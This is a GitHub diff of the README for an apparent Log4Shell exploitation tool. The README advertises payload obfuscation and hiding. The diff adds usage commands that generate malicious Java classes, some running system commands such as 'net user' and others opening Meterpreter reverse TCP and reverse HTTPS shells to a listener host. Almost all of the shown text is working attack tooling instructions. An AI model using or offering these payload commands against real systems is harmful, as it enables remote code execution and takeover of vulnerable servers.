File tree Expand file tree Collapse file tree 1 file changed +9
-6
lines changed Expand file tree Collapse file tree 1 file changed +9
-6
lines changed Original file line number Diff line number Diff line change 1111 * Support multi Java class files
1212 * Support LDAPS and HTTPS server
1313 * Support ACME to sign certificate
14- * Generate class without java compiler
14+ * Generate class without Java compiler
1515 * Support obfuscate malicious(payload)
1616 * Hide malicious(payload) string
1717 * Add secret to protect HTTP server
3333 ```
3434 Execute(no output):
3535 Log4Shell.exe -gen "execute" -args "-cmd calc" -class "Test"
36-
36+
3737 System(with output):
3838 Log4Shell.exe -gen "system" -args "-bin cmd -args \"/c net user\"" -class "Test"
39-
40- ReverseTCP(java/meterpreter/reverse_tcp): // template will be open source after some time
41- Log4Shell.exe -gen "reverse_tcp" -args "-host 127.0.0.1 -port 9979" -class "Test"
42-
39+
40+ ReverseTCP(java/meterpreter/reverse_tcp): // template will be open source after some time
41+ Log4Shell.exe -gen "reverse_tcp" -args "-lhost 1.1.1.1 -lport 9979" -class "Test"
42+
43+ ReverseHTTPS(java/meterpreter/reverse_https): // template will be open source after some time
44+ Log4Shell.exe -gen "reverse_https" -args "-lhost 1.1.1.1 -lport 8443 -luri test" -class "Test"
45+
4346 The generated class file will be saved to the payload directory(can set output flag)
4447 ```
4548
You can’t perform that action at this time.
0 commit comments